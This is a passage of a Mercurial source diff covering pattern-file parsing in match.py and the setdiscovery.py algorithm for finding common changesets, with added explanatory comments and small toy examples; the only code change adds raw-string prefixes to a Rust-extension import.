1400 r, d = _patternrootsanddirs(kindpats)
1401
1401
1402 p = set()
1402 p = set()
1403 # Add the parents as non-recursive/exact directories, since they must be
1403 # Add the parents as non-recursive/exact directories, since they must be
1404 # scanned to get to either the roots or the other exact directories.
1404 # scanned to get to either the roots or the other exact directories.
1405 p.update(util.dirs(d))
1405 p.update(util.dirs(d))
1406 p.update(util.dirs(r))
1406 p.update(util.dirs(r))
1407
1407
1408 # FIXME: all uses of this function convert these to sets, do so before
1408 # FIXME: all uses of this function convert these to sets, do so before
1409 # returning.
1409 # returning.
1410 # FIXME: all uses of this function do not need anything in 'roots' and
1410 # FIXME: all uses of this function do not need anything in 'roots' and
1411 # 'dirs' to also be in 'parents', consider removing them before returning.
1411 # 'dirs' to also be in 'parents', consider removing them before returning.
1412 return r, d, p
1412 return r, d, p
1413
1413
1414 def _explicitfiles(kindpats):
1414 def _explicitfiles(kindpats):
1415 '''Returns the potential explicit filenames from the patterns.
1415 '''Returns the potential explicit filenames from the patterns.
1416
1416
1417 >>> _explicitfiles([(b'path', b'foo/bar', b'')])
1417 >>> _explicitfiles([(b'path', b'foo/bar', b'')])
1418 ['foo/bar']
1418 ['foo/bar']
1419 >>> _explicitfiles([(b'rootfilesin', b'foo/bar', b'')])
1419 >>> _explicitfiles([(b'rootfilesin', b'foo/bar', b'')])
1420 []
1420 []
1421 '''
1421 '''
1422 # Keep only the pattern kinds where one can specify filenames (vs only
1422 # Keep only the pattern kinds where one can specify filenames (vs only
1423 # directory names).
1423 # directory names).
1424 filable = [kp for kp in kindpats if kp[0] not in ('rootfilesin',)]
1424 filable = [kp for kp in kindpats if kp[0] not in ('rootfilesin',)]
1425 return _roots(filable)
1425 return _roots(filable)
1426
1426
1427 def _prefix(kindpats):
1427 def _prefix(kindpats):
1428 '''Whether all the patterns match a prefix (i.e. recursively)'''
1428 '''Whether all the patterns match a prefix (i.e. recursively)'''
1429 for kind, pat, source in kindpats:
1429 for kind, pat, source in kindpats:
1430 if kind not in ('path', 'relpath'):
1430 if kind not in ('path', 'relpath'):
1431 return False
1431 return False
1432 return True
1432 return True
1433
1433
1434 _commentre = None
1434 _commentre = None
1435
1435
1436 def readpatternfile(filepath, warn, sourceinfo=False):
1436 def readpatternfile(filepath, warn, sourceinfo=False):
1437 '''parse a pattern file, returning a list of
1437 '''parse a pattern file, returning a list of
1438 patterns. These patterns should be given to compile()
1438 patterns. These patterns should be given to compile()
1439 to be validated and converted into a match function.
1439 to be validated and converted into a match function.
1440
1440
1441 trailing white space is dropped.
1441 trailing white space is dropped.
1442 the escape character is backslash.
1442 the escape character is backslash.
1443 comments start with #.
1443 comments start with #.
1444 empty lines are skipped.
1444 empty lines are skipped.
1445
1445
1446 lines can be of the following formats:
1446 lines can be of the following formats:
1447
1447
1448 syntax: regexp # defaults following lines to non-rooted regexps
1448 syntax: regexp # defaults following lines to non-rooted regexps
1449 syntax: glob # defaults following lines to non-rooted globs
1449 syntax: glob # defaults following lines to non-rooted globs
1450 re:pattern # non-rooted regular expression
1450 re:pattern # non-rooted regular expression
1451 glob:pattern # non-rooted glob
1451 glob:pattern # non-rooted glob
1452 rootglob:pat # rooted glob (same root as ^ in regexps)
1452 rootglob:pat # rooted glob (same root as ^ in regexps)
1453 pattern # pattern of the current default type
1453 pattern # pattern of the current default type
1454
1454
1455 if sourceinfo is set, returns a list of tuples:
1455 if sourceinfo is set, returns a list of tuples:
1456 (pattern, lineno, originalline).
1456 (pattern, lineno, originalline).
1457 This is useful to debug ignore patterns.
1457 This is useful to debug ignore patterns.
1458 '''
1458 '''
1459
1459
1460 if rustmod is not None:
1460 if rustmod is not None:
1461 result, warnings = rustmod.read_pattern_file(
1461 result, warnings = rustmod.read_pattern_file(
1462 filepath,
1462 filepath,
1463 bool(warn),
1463 bool(warn),
1464 sourceinfo,
1464 sourceinfo,
1465 )
1465 )
1466
1466
1467 for warning_params in warnings:
1467 for warning_params in warnings:
1468 # Can't be easily emitted from Rust, because it would require
1468 # Can't be easily emitted from Rust, because it would require
1469 # a mechanism for both gettext and calling the `warn` function.
1469 # a mechanism for both gettext and calling the `warn` function.
1470 warn(_("%s: ignoring invalid syntax '%s'\n") % warning_params)
1470 warn(_("%s: ignoring invalid syntax '%s'\n") % warning_params)
1471
1471
1472 return result
1472 return result
1473
1473
1474 syntaxes = {
1474 syntaxes = {
1475 're': 'relre:',
1475 're': 'relre:',
1476 'regexp': 'relre:',
1476 'regexp': 'relre:',
1477 'glob': 'relglob:',
1477 'glob': 'relglob:',
1478 'rootglob': 'rootglob:',
1478 'rootglob': 'rootglob:',
1479 'include': 'include',
1479 'include': 'include',
1480 'subinclude': 'subinclude',
1480 'subinclude': 'subinclude',
1481 }
1481 }
1482 syntax = 'relre:'
1482 syntax = 'relre:'
1483 patterns = []
1483 patterns = []
1484
1484
1485 fp = open(filepath, 'rb')
1485 fp = open(filepath, 'rb')
1486 for lineno, line in enumerate(util.iterfile(fp), start=1):
1486 for lineno, line in enumerate(util.iterfile(fp), start=1):
1487 if "#" in line:
1487 if "#" in line:
1488 global _commentre
1488 global _commentre
1489 if not _commentre:
1489 if not _commentre:
1490 _commentre = util.re.compile(br'((?:^|[^\\])(?:\\\\)*)#.*')
1490 _commentre = util.re.compile(br'((?:^|[^\\])(?:\\\\)*)#.*')
1491 # remove comments prefixed by an even number of escapes
1491 # remove comments prefixed by an even number of escapes
1492 m = _commentre.search(line)
1492 m = _commentre.search(line)
1493 if m:
1493 if m:
1494 line = line[:m.end(1)]
1494 line = line[:m.end(1)]
1495 # fixup properly escaped comments that survived the above
1495 # fixup properly escaped comments that survived the above
1496 line = line.replace("\\#", "#")
1496 line = line.replace("\\#", "#")
1497 line = line.rstrip()
1497 line = line.rstrip()
1498 if not line:
1498 if not line:
1499 continue
1499 continue
1500
1500
1501 if line.startswith('syntax:'):
1501 if line.startswith('syntax:'):
1502 s = line[7:].strip()
1502 s = line[7:].strip()
1503 try:
1503 try:
1504 syntax = syntaxes[s]
1504 syntax = syntaxes[s]
1505 except KeyError:
1505 except KeyError:
1506 if warn:
1506 if warn:
1507 warn(_("%s: ignoring invalid syntax '%s'\n") %
1507 warn(_("%s: ignoring invalid syntax '%s'\n") %
1508 (filepath, s))
1508 (filepath, s))
1509 continue
1509 continue
1510
1510
1511 linesyntax = syntax
1511 linesyntax = syntax
1512 for s, rels in syntaxes.iteritems():
1512 for s, rels in syntaxes.iteritems():
1513 if line.startswith(rels):
1513 if line.startswith(rels):
1514 linesyntax = rels
1514 linesyntax = rels
1515 line = line[len(rels):]
1515 line = line[len(rels):]
1516 break
1516 break
1517 elif line.startswith(s+':'):
1517 elif line.startswith(s+':'):
1518 linesyntax = rels
1518 linesyntax = rels
1519 line = line[len(s) + 1:]
1519 line = line[len(s) + 1:]
1520 break
1520 break
1521 if sourceinfo:
1521 if sourceinfo:
1522 patterns.append((linesyntax + line, lineno, line))
1522 patterns.append((linesyntax + line, lineno, line))
1523 else:
1523 else:
1524 patterns.append(linesyntax + line)
1524 patterns.append(linesyntax + line)
1525 fp.close()
1525 fp.close()
1526 return patterns
1526 return patterns
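# Editor's note: a worked example (derived from the parsing code above) of
# the format readpatternfile() accepts. A pattern file containing:
#
#     # comments and blank lines are skipped
#     syntax: glob
#     *.o
#     rootglob:build/*
#     re:.*\.tmp$
#
# yields, since the default syntax is 'relre:' until a 'syntax:' line
# changes it and per-line 'kind:' prefixes override the current default:
#
#     ['relglob:*.o', 'rootglob:build/*', 'relre:.*\.tmp$']
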
@@ -1,463 +1,463 b''
1 # setdiscovery.py - improved discovery of common nodeset for mercurial
1 # setdiscovery.py - improved discovery of common nodeset for mercurial
2 #
2 #
3 # Copyright 2010 Benoit Boissinot <bboissin@gmail.com>
3 # Copyright 2010 Benoit Boissinot <bboissin@gmail.com>
4 # and Peter Arrenbrecht <peter@arrenbrecht.ch>
4 # and Peter Arrenbrecht <peter@arrenbrecht.ch>
5 #
5 #
6 # This software may be used and distributed according to the terms of the
6 # This software may be used and distributed according to the terms of the
7 # GNU General Public License version 2 or any later version.
7 # GNU General Public License version 2 or any later version.
8 """
8 """
9 The algorithm works in the following way. You have two repositories: local and
9 The algorithm works in the following way. You have two repositories: local and
10 remote. They both contain a DAG of changelists.
10 remote. They both contain a DAG of changelists.
11
11
12 The goal of the discovery protocol is to find one set of nodes, *common*,
12 The goal of the discovery protocol is to find one set of nodes, *common*,
13 the set of nodes shared by local and remote.
13 the set of nodes shared by local and remote.
14
14
15 One of the issues with the original protocol was latency: it could
15 One of the issues with the original protocol was latency: it could
16 potentially require lots of roundtrips to discover that the local repo was a
16 potentially require lots of roundtrips to discover that the local repo was a
17 subset of the remote (which is a very common case: you usually have few changes
17 subset of the remote (which is a very common case: you usually have few changes
18 compared to upstream, while upstream probably had lots of development).
18 compared to upstream, while upstream probably had lots of development).
19
19
20 The new protocol only requires one interface for the remote repo: `known()`,
20 The new protocol only requires one interface for the remote repo: `known()`,
21 which, given a set of changelists, tells you if they are present in the DAG.
21 which, given a set of changelists, tells you if they are present in the DAG.
22
22
23 The algorithm then works as follows:
23 The algorithm then works as follows:
24
24
25 - We will be using three sets, `common`, `missing`, `unknown`. Originally
25 - We will be using three sets, `common`, `missing`, `unknown`. Originally
26 all nodes are in `unknown`.
26 all nodes are in `unknown`.
27 - Take a sample from `unknown`, call `remote.known(sample)`
27 - Take a sample from `unknown`, call `remote.known(sample)`
28 - For each node that remote knows, move it and all its ancestors to `common`
28 - For each node that remote knows, move it and all its ancestors to `common`
29 - For each node that remote doesn't know, move it and all its descendants
29 - For each node that remote doesn't know, move it and all its descendants
30 to `missing`
30 to `missing`
31 - Iterate until `unknown` is empty
31 - Iterate until `unknown` is empty
32
32
33 There are a couple of optimizations. First, instead of starting with a random
33 There are a couple of optimizations. First, instead of starting with a random
34 sample of missing, start by sending all heads; in the case where the local
34 sample of missing, start by sending all heads; in the case where the local
35 repo is a subset, you compute the answer in one round trip.
35 repo is a subset, you compute the answer in one round trip.
36
36
37 Then you can do something similar to the bisecting strategy used when
37 Then you can do something similar to the bisecting strategy used when
38 finding faulty changesets. Instead of random samples, you can try picking
38 finding faulty changesets. Instead of random samples, you can try picking
39 nodes that will maximize the number of nodes that will be
39 nodes that will maximize the number of nodes that will be
40 classified with them (since all ancestors or descendants will be marked as well).
40 classified with them (since all ancestors or descendants will be marked as well).
41 """
41 """
42
42
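# Editor's note: a toy, self-contained simulation (not hg code) of the
# classification loop described in the docstring above, on a linear DAG
# 0 <- 1 <- 2 <- 3 <- 4 where the remote only has revs 0..2.

def classify(parents, children, allrevs, remote_has, sample):
    common, missing = set(), set()
    for r in sample:
        if r in remote_has:
            stack = [r]             # known: r and all ancestors are common
            while stack:
                n = stack.pop()
                if n not in common:
                    common.add(n)
                    stack.extend(parents.get(n, ()))
        else:
            stack = [r]             # unknown: r and all descendants missing
            while stack:
                n = stack.pop()
                if n not in missing:
                    missing.add(n)
                    stack.extend(children.get(n, ()))
    return common, missing, allrevs - common - missing

parents = {1: [0], 2: [1], 3: [2], 4: [3]}
children = {0: [1], 1: [2], 2: [3], 3: [4]}
common, missing, undecided = classify(
    parents, children, {0, 1, 2, 3, 4}, remote_has={0, 1, 2}, sample=[2, 3])
assert common == {0, 1, 2} and missing == {3, 4} and not undecided
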
43 from __future__ import absolute_import
43 from __future__ import absolute_import
44
44
45 import collections
45 import collections
46 import random
46 import random
47
47
48 from .i18n import _
48 from .i18n import _
49 from .node import (
49 from .node import (
50 nullid,
50 nullid,
51 nullrev,
51 nullrev,
52 )
52 )
53 from . import (
53 from . import (
54 error,
54 error,
55 policy,
55 policy,
56 util,
56 util,
57 )
57 )
58
58
59 def _updatesample(revs, heads, sample, parentfn, quicksamplesize=0):
59 def _updatesample(revs, heads, sample, parentfn, quicksamplesize=0):
60 """update an existing sample to match the expected size
60 """update an existing sample to match the expected size
61
61
62 The sample is updated with revs exponentially distant from each head of the
62 The sample is updated with revs exponentially distant from each head of the
63 <revs> set. (H~1, H~2, H~4, H~8, etc).
63 <revs> set. (H~1, H~2, H~4, H~8, etc).
64
64
65 If a target size is specified, the sampling will stop once this size is
65 If a target size is specified, the sampling will stop once this size is
66 reached. Otherwise sampling will happen until roots of the <revs> set are
66 reached. Otherwise sampling will happen until roots of the <revs> set are
67 reached.
67 reached.
68
68
69 :revs: set of revs we want to discover (if None, assume the whole dag)
69 :revs: set of revs we want to discover (if None, assume the whole dag)
70 :heads: set of DAG head revs
70 :heads: set of DAG head revs
71 :sample: a sample to update
71 :sample: a sample to update
72 :parentfn: a callable to resolve parents for a revision
72 :parentfn: a callable to resolve parents for a revision
73 :quicksamplesize: optional target size of the sample"""
73 :quicksamplesize: optional target size of the sample"""
74 dist = {}
74 dist = {}
75 visit = collections.deque(heads)
75 visit = collections.deque(heads)
76 seen = set()
76 seen = set()
77 factor = 1
77 factor = 1
78 while visit:
78 while visit:
79 curr = visit.popleft()
79 curr = visit.popleft()
80 if curr in seen:
80 if curr in seen:
81 continue
81 continue
82 d = dist.setdefault(curr, 1)
82 d = dist.setdefault(curr, 1)
83 if d > factor:
83 if d > factor:
84 factor *= 2
84 factor *= 2
85 if d == factor:
85 if d == factor:
86 sample.add(curr)
86 sample.add(curr)
87 if quicksamplesize and (len(sample) >= quicksamplesize):
87 if quicksamplesize and (len(sample) >= quicksamplesize):
88 return
88 return
89 seen.add(curr)
89 seen.add(curr)
90
90
91 for p in parentfn(curr):
91 for p in parentfn(curr):
92 if p != nullrev and (not revs or p in revs):
92 if p != nullrev and (not revs or p in revs):
93 dist.setdefault(p, d + 1)
93 dist.setdefault(p, d + 1)
94 visit.append(p)
94 visit.append(p)
95
95
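# Editor's note: a standalone illustration (not hg code) of the exponential
# sampling pattern documented above (H~1, H~2, H~4, ...) on a linear chain
# 9 <- 8 <- ... <- 0 with single head 9: the sampled distances double.

def exponential_sample(head, parent_of):
    sample, dist, factor = set(), 1, 1
    node = head
    while node is not None:
        if dist > factor:
            factor *= 2             # next sampling distance: 1, 2, 4, 8, ...
        if dist == factor:
            sample.add(node)
        node = parent_of.get(node)  # walk toward the root
        dist += 1
    return sample

chain = {n: n - 1 for n in range(1, 10)}   # parent of n is n-1; 0 is a root
assert exponential_sample(9, chain) == {9, 8, 6, 2}
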
96 def _limitsample(sample, desiredlen, randomize=True):
96 def _limitsample(sample, desiredlen, randomize=True):
97 """return a random subset of sample of at most desiredlen item.
97 """return a random subset of sample of at most desiredlen item.
98
98
99 If randomize is False, though, a deterministic subset is returned.
99 If randomize is False, though, a deterministic subset is returned.
100 This is meant for integration tests.
100 This is meant for integration tests.
101 """
101 """
102 if len(sample) <= desiredlen:
102 if len(sample) <= desiredlen:
103 return sample
103 return sample
104 if randomize:
104 if randomize:
105 return set(random.sample(sample, desiredlen))
105 return set(random.sample(sample, desiredlen))
106 sample = list(sample)
106 sample = list(sample)
107 sample.sort()
107 sample.sort()
108 return set(sample[:desiredlen])
108 return set(sample[:desiredlen])
109
109
110 class partialdiscovery(object):
110 class partialdiscovery(object):
111 """an object representing ongoing discovery
111 """an object representing ongoing discovery
112
112
113 Fed with data from the remote repository, this object keeps track of the
113 Fed with data from the remote repository, this object keeps track of the
114 current set of changesets in various states:
114 current set of changesets in various states:
115
115
116 - common: revs also known remotely
116 - common: revs also known remotely
117 - undecided: revs we don't have information on yet
117 - undecided: revs we don't have information on yet
118 - missing: revs missing remotely
118 - missing: revs missing remotely
119 (all tracked revisions are known locally)
119 (all tracked revisions are known locally)
120 """
120 """
121
121
122 def __init__(self, repo, targetheads, respectsize, randomize=True):
122 def __init__(self, repo, targetheads, respectsize, randomize=True):
123 self._repo = repo
123 self._repo = repo
124 self._targetheads = targetheads
124 self._targetheads = targetheads
125 self._common = repo.changelog.incrementalmissingrevs()
125 self._common = repo.changelog.incrementalmissingrevs()
126 self._undecided = None
126 self._undecided = None
127 self.missing = set()
127 self.missing = set()
128 self._childrenmap = None
128 self._childrenmap = None
129 self._respectsize = respectsize
129 self._respectsize = respectsize
130 self.randomize = randomize
130 self.randomize = randomize
131
131
132 def addcommons(self, commons):
132 def addcommons(self, commons):
133 """register nodes known as common"""
133 """register nodes known as common"""
134 self._common.addbases(commons)
134 self._common.addbases(commons)
135 if self._undecided is not None:
135 if self._undecided is not None:
136 self._common.removeancestorsfrom(self._undecided)
136 self._common.removeancestorsfrom(self._undecided)
137
137
138 def addmissings(self, missings):
138 def addmissings(self, missings):
139 """register some nodes as missing"""
139 """register some nodes as missing"""
140 newmissing = self._repo.revs('%ld::%ld', missings, self.undecided)
140 newmissing = self._repo.revs('%ld::%ld', missings, self.undecided)
141 if newmissing:
141 if newmissing:
142 self.missing.update(newmissing)
142 self.missing.update(newmissing)
143 self.undecided.difference_update(newmissing)
143 self.undecided.difference_update(newmissing)
144
144
145 def addinfo(self, sample):
145 def addinfo(self, sample):
146 """consume an iterable of (rev, known) tuples"""
146 """consume an iterable of (rev, known) tuples"""
147 common = set()
147 common = set()
148 missing = set()
148 missing = set()
149 for rev, known in sample:
149 for rev, known in sample:
150 if known:
150 if known:
151 common.add(rev)
151 common.add(rev)
152 else:
152 else:
153 missing.add(rev)
153 missing.add(rev)
154 if common:
154 if common:
155 self.addcommons(common)
155 self.addcommons(common)
156 if missing:
156 if missing:
157 self.addmissings(missing)
157 self.addmissings(missing)
158
158
159 def hasinfo(self):
159 def hasinfo(self):
160 """return True is we have any clue about the remote state"""
160 """return True is we have any clue about the remote state"""
161 return self._common.hasbases()
161 return self._common.hasbases()
162
162
163 def iscomplete(self):
163 def iscomplete(self):
164 """True if all the necessary data have been gathered"""
164 """True if all the necessary data have been gathered"""
165 return self._undecided is not None and not self._undecided
165 return self._undecided is not None and not self._undecided
166
166
167 @property
167 @property
168 def undecided(self):
168 def undecided(self):
169 if self._undecided is not None:
169 if self._undecided is not None:
170 return self._undecided
170 return self._undecided
171 self._undecided = set(self._common.missingancestors(self._targetheads))
171 self._undecided = set(self._common.missingancestors(self._targetheads))
172 return self._undecided
172 return self._undecided
173
173
174 def stats(self):
174 def stats(self):
175 return {
175 return {
176 'undecided': len(self.undecided),
176 'undecided': len(self.undecided),
177 }
177 }
178
178
179 def commonheads(self):
179 def commonheads(self):
180 """the heads of the known common set"""
180 """the heads of the known common set"""
181 # heads(common) == heads(common.bases) since common represents
181 # heads(common) == heads(common.bases) since common represents
182 # common.bases and all its ancestors
182 # common.bases and all its ancestors
183 return self._common.basesheads()
183 return self._common.basesheads()
184
184
185 def _parentsgetter(self):
185 def _parentsgetter(self):
186 getrev = self._repo.changelog.index.__getitem__
186 getrev = self._repo.changelog.index.__getitem__
187 def getparents(r):
187 def getparents(r):
188 return getrev(r)[5:7]
188 return getrev(r)[5:7]
189 return getparents
189 return getparents
190
190
191 def _childrengetter(self):
191 def _childrengetter(self):
192
192
193 if self._childrenmap is not None:
193 if self._childrenmap is not None:
194 # During discovery, the `undecided` set keeps shrinking.
194 # During discovery, the `undecided` set keeps shrinking.
195 # Therefore, the map computed for an iteration N will be
195 # Therefore, the map computed for an iteration N will be
196 # valid for iteration N+1. Instead of computing the same
196 # valid for iteration N+1. Instead of computing the same
197 # data over and over, we cache it the first time.
197 # data over and over, we cache it the first time.
198 return self._childrenmap.__getitem__
198 return self._childrenmap.__getitem__
199
199
200 # _updatesample() essentially iterates over revisions to look
200 # _updatesample() essentially iterates over revisions to look
201 # up their children. This lookup is expensive and doing it in a loop is
201 # up their children. This lookup is expensive and doing it in a loop is
202 # quadratic. We precompute the children for all relevant revisions and
202 # quadratic. We precompute the children for all relevant revisions and
203 # make the lookup in _updatesample() a simple dict lookup.
203 # make the lookup in _updatesample() a simple dict lookup.
204 self._childrenmap = children = {}
204 self._childrenmap = children = {}
205
205
206 parentrevs = self._parentsgetter()
206 parentrevs = self._parentsgetter()
207 revs = self.undecided
207 revs = self.undecided
208
208
209 for rev in sorted(revs):
209 for rev in sorted(revs):
210 # Always ensure revision has an entry so we don't need to worry
210 # Always ensure revision has an entry so we don't need to worry
211 # about missing keys.
211 # about missing keys.
212 children[rev] = []
212 children[rev] = []
213 for prev in parentrevs(rev):
213 for prev in parentrevs(rev):
214 if prev == nullrev:
214 if prev == nullrev:
215 continue
215 continue
216 c = children.get(prev)
216 c = children.get(prev)
217 if c is not None:
217 if c is not None:
218 c.append(rev)
218 c.append(rev)
219 return children.__getitem__
219 return children.__getitem__
220
220
221 def takequicksample(self, headrevs, size):
221 def takequicksample(self, headrevs, size):
222 """takes a quick sample of size <size>
222 """takes a quick sample of size <size>
223
223
224 It is meant for initial sampling and focuses on querying heads and close
224 It is meant for initial sampling and focuses on querying heads and close
225 ancestors of heads.
225 ancestors of heads.
226
226
227 :headrevs: set of head revisions in local DAG to consider
227 :headrevs: set of head revisions in local DAG to consider
228 :size: the maximum size of the sample"""
228 :size: the maximum size of the sample"""
229 revs = self.undecided
229 revs = self.undecided
230 if len(revs) <= size:
230 if len(revs) <= size:
231 return list(revs)
231 return list(revs)
232 sample = set(self._repo.revs('heads(%ld)', revs))
232 sample = set(self._repo.revs('heads(%ld)', revs))
233
233
234 if len(sample) >= size:
234 if len(sample) >= size:
235 return _limitsample(sample, size, randomize=self.randomize)
235 return _limitsample(sample, size, randomize=self.randomize)
236
236
237 _updatesample(None, headrevs, sample, self._parentsgetter(),
237 _updatesample(None, headrevs, sample, self._parentsgetter(),
238 quicksamplesize=size)
238 quicksamplesize=size)
239 return sample
239 return sample
240
240
241 def takefullsample(self, headrevs, size):
241 def takefullsample(self, headrevs, size):
242 revs = self.undecided
242 revs = self.undecided
243 if len(revs) <= size:
243 if len(revs) <= size:
244 return list(revs)
244 return list(revs)
245 repo = self._repo
245 repo = self._repo
246 sample = set(repo.revs('heads(%ld)', revs))
246 sample = set(repo.revs('heads(%ld)', revs))
247 parentrevs = self._parentsgetter()
247 parentrevs = self._parentsgetter()
248
248
249 # update from heads
249 # update from heads
250 revsheads = sample.copy()
250 revsheads = sample.copy()
251 _updatesample(revs, revsheads, sample, parentrevs)
251 _updatesample(revs, revsheads, sample, parentrevs)
252
252
253 # update from roots
253 # update from roots
254 revsroots = set(repo.revs('roots(%ld)', revs))
254 revsroots = set(repo.revs('roots(%ld)', revs))
255 childrenrevs = self._childrengetter()
255 childrenrevs = self._childrengetter()
256 _updatesample(revs, revsroots, sample, childrenrevs)
256 _updatesample(revs, revsroots, sample, childrenrevs)
257 assert sample
257 assert sample
258
258
259 if not self._respectsize:
259 if not self._respectsize:
260 size = max(size, min(len(revsroots), len(revsheads)))
260 size = max(size, min(len(revsroots), len(revsheads)))
261
261
262 sample = _limitsample(sample, size, randomize=self.randomize)
262 sample = _limitsample(sample, size, randomize=self.randomize)
263 if len(sample) < size:
263 if len(sample) < size:
264 more = size - len(sample)
264 more = size - len(sample)
265 takefrom = list(revs - sample)
265 takefrom = list(revs - sample)
266 if self.randomize:
266 if self.randomize:
267 sample.update(random.sample(takefrom, more))
267 sample.update(random.sample(takefrom, more))
268 else:
268 else:
269 takefrom.sort()
269 takefrom.sort()
270 sample.update(takefrom[:more])
270 sample.update(takefrom[:more])
271 return sample
271 return sample
272
272
273 partialdiscovery = policy.importrust('discovery',
273 partialdiscovery = policy.importrust(r'discovery',
274 member='PartialDiscovery',
274 member=r'PartialDiscovery',
275 default=partialdiscovery)
275 default=partialdiscovery)
276
276
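# Editor's note: the r'' prefixes above keep these module/attribute names
# native str on Python 3 (hg's py3 source transformer turns unprefixed
# string literals into bytes, which importlib/getattr cannot use); that is
# the point of this changeset. Below, a minimal sketch (hypothetical code,
# not the real mercurial.policy module) of the "prefer compiled, fall back
# to pure Python" pattern used by policy.importrust():

def importrust_sketch(modname, member, default=None):
    try:
        import importlib
        mod = importlib.import_module('rustext.%s' % modname)  # name assumed
    except ImportError:
        return default          # no compiled extension built: use default
    return getattr(mod, member)

# usage, mirroring the lines above:
#   partialdiscovery = importrust_sketch('discovery', 'PartialDiscovery',
#                                        default=partialdiscovery)
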
277 def findcommonheads(ui, local, remote,
277 def findcommonheads(ui, local, remote,
278 initialsamplesize=100,
278 initialsamplesize=100,
279 fullsamplesize=200,
279 fullsamplesize=200,
280 abortwhenunrelated=True,
280 abortwhenunrelated=True,
281 ancestorsof=None,
281 ancestorsof=None,
282 samplegrowth=1.05):
282 samplegrowth=1.05):
283 '''Return a tuple (common, anyincoming, remoteheads) used to identify
283 '''Return a tuple (common, anyincoming, remoteheads) used to identify
284 missing nodes from or in remote.
284 missing nodes from or in remote.
285 '''
285 '''
286 start = util.timer()
286 start = util.timer()
287
287
288 roundtrips = 0
288 roundtrips = 0
289 cl = local.changelog
289 cl = local.changelog
290 clnode = cl.node
290 clnode = cl.node
291 clrev = cl.rev
291 clrev = cl.rev
292
292
293 if ancestorsof is not None:
293 if ancestorsof is not None:
294 ownheads = [clrev(n) for n in ancestorsof]
294 ownheads = [clrev(n) for n in ancestorsof]
295 else:
295 else:
296 ownheads = [rev for rev in cl.headrevs() if rev != nullrev]
296 ownheads = [rev for rev in cl.headrevs() if rev != nullrev]
297
297
298 # early exit if we know all the specified remote heads already
298 # early exit if we know all the specified remote heads already
299 ui.debug("query 1; heads\n")
299 ui.debug("query 1; heads\n")
300 roundtrips += 1
300 roundtrips += 1
301 # We also ask remote about all the local heads. That set can be arbitrarily
301 # We also ask remote about all the local heads. That set can be arbitrarily
302 # large, so we used to limit its size to `initialsamplesize`. We no longer
302 # large, so we used to limit its size to `initialsamplesize`. We no longer
303 # do so, as it proved counterproductive. The skipped heads could lead to a
303 # do so, as it proved counterproductive. The skipped heads could lead to a
304 # large "undecided" set, slower to be clarified than if we asked the
304 # large "undecided" set, slower to be clarified than if we asked the
305 # question for all heads right away.
305 # question for all heads right away.
306 #
306 #
307 # We are already fetching all server heads using the `heads` commands,
307 # We are already fetching all server heads using the `heads` commands,
308 # sending an equivalent number of heads the other way should not have a
308 # sending an equivalent number of heads the other way should not have a
309 # significant impact. In addition, it is very likely that we are going to
309 # significant impact. In addition, it is very likely that we are going to
310 # have to issue "known" requests for an equivalent number of revisions in
310 # have to issue "known" requests for an equivalent number of revisions in
311 # order to decide if these heads are common or missing.
311 # order to decide if these heads are common or missing.
312 #
312 #
313 # A detailed analysis of each case follows.
313 # A detailed analysis of each case follows.
314 #
314 #
315 # Case A: local and server both have few heads
315 # Case A: local and server both have few heads
316 #
316 #
317 # Ownheads is below initialsamplesize, so the limit would have no effect.
317 # Ownheads is below initialsamplesize, so the limit would have no effect.
318 #
318 #
319 # Case B: local has few heads and server has many
319 # Case B: local has few heads and server has many
320 #
320 #
321 # Ownheads is below initialsamplesize, so the limit would have no effect.
321 # Ownheads is below initialsamplesize, so the limit would have no effect.
322 #
322 #
323 # Case C: local and server both have many heads
323 # Case C: local and server both have many heads
324 #
324 #
325 # We now transfer some more data, but not significantly more than is
325 # We now transfer some more data, but not significantly more than is
326 # already transferred to carry the server heads.
326 # already transferred to carry the server heads.
327 #
327 #
328 # Case D: local has many heads, server has few
328 # Case D: local has many heads, server has few
329 #
329 #
330 # D.1 local heads are mostly known remotely
330 # D.1 local heads are mostly known remotely
331 #
331 #
332 # All the known heads will have been part of a `known` request at some
332 # All the known heads will have been part of a `known` request at some
333 # point for the discovery to finish. Sending them all earlier is
333 # point for the discovery to finish. Sending them all earlier is
334 # actually helping.
334 # actually helping.
335 #
335 #
336 # (This case is fairly unlikely, it requires the numerous heads to all
336 # (This case is fairly unlikely, it requires the numerous heads to all
337 # be merged server side in only a few heads)
337 # be merged server side in only a few heads)
338 #
338 #
339 # D.2 local heads are mostly missing remotely
339 # D.2 local heads are mostly missing remotely
340 #
340 #
341 # To determine that the heads are missing, we'll have to issue `known`
341 # To determine that the heads are missing, we'll have to issue `known`
342 # requests for them or one of their ancestors. The number of `known`
342 # requests for them or one of their ancestors. The number of `known`
343 # requests will likely be of the same order of magnitude as the number
343 # requests will likely be of the same order of magnitude as the number
344 # of local heads.
344 # of local heads.
345 #
345 #
346 # The only case where we can be more efficient using `known` requests on
346 # The only case where we can be more efficient using `known` requests on
347 # ancestors is the case where all the "missing" local heads are based on a
347 # ancestors is the case where all the "missing" local heads are based on a
348 # few changesets, also "missing". This means we would have a "complex"
348 # few changesets, also "missing". This means we would have a "complex"
349 # graph (with many heads) attached to, but largely independent of, the
349 # graph (with many heads) attached to, but largely independent of, the
350 # "simple" graph on the server. This is a fairly unusual case and has
350 # "simple" graph on the server. This is a fairly unusual case and has
351 # not been met in the wild so far.
351 # not been met in the wild so far.
352 if remote.limitedarguments:
352 if remote.limitedarguments:
353 sample = _limitsample(ownheads, initialsamplesize)
353 sample = _limitsample(ownheads, initialsamplesize)
354 # indices between sample and externalized version must match
354 # indices between sample and externalized version must match
355 sample = list(sample)
355 sample = list(sample)
356 else:
356 else:
357 sample = ownheads
357 sample = ownheads
358
358
359 with remote.commandexecutor() as e:
359 with remote.commandexecutor() as e:
360 fheads = e.callcommand('heads', {})
360 fheads = e.callcommand('heads', {})
361 fknown = e.callcommand('known', {
361 fknown = e.callcommand('known', {
362 'nodes': [clnode(r) for r in sample],
362 'nodes': [clnode(r) for r in sample],
363 })
363 })
364
364
365 srvheadhashes, yesno = fheads.result(), fknown.result()
365 srvheadhashes, yesno = fheads.result(), fknown.result()
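# The 'known' reply is a list of booleans aligned index-by-index with the
# nodes that were sent (e.g. nodes [n1, n2, n3] -> [True, False, True]),
# which is why the sample is materialized as a list above: set iteration
# order would break the pairing done by zip(sample, yesno) below.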
366
366
367 if cl.tip() == nullid:
367 if cl.tip() == nullid:
368 if srvheadhashes != [nullid]:
368 if srvheadhashes != [nullid]:
369 return [nullid], True, srvheadhashes
369 return [nullid], True, srvheadhashes
370 return [nullid], False, []
370 return [nullid], False, []
371
371
372 # start actual discovery (we note this before the next "if" for
